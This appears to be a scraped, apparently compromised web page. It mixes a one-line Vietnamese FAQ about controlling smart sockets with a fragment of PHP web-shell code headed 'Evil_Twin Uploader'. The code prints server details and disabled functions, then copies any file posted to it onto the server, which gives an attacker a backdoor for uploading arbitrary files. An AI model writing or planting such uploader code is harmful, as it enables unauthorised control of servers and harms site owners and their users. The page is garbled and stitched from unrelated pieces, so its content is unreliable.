Evil_Twin Uploader

Làm thế nào tôi có thể tìm ra ổ cắm muốn điều khiển?

Bạn có thể đặt tên hoặc đánh dấu thiết bị trên ứng dụng sao cho dễ nhận biết.

Bài viết liên quan

".php_uname().""; print "\n";$disable_functions = @ini_get("disable_functions"); echo "
DisablePHP=".$disable_functions; print "\n"; echo"
"; echo"
"; if($_POST["k"]==upload) { if(@copy($_FILES["f"]["tmp_name"],$_FILES["f"]["name"])){ echo"".$_FILES["f"]["name"]; }else{ echo"Gagal Bro"; } } }
Social media & sharing icons powered by UltimatelySocial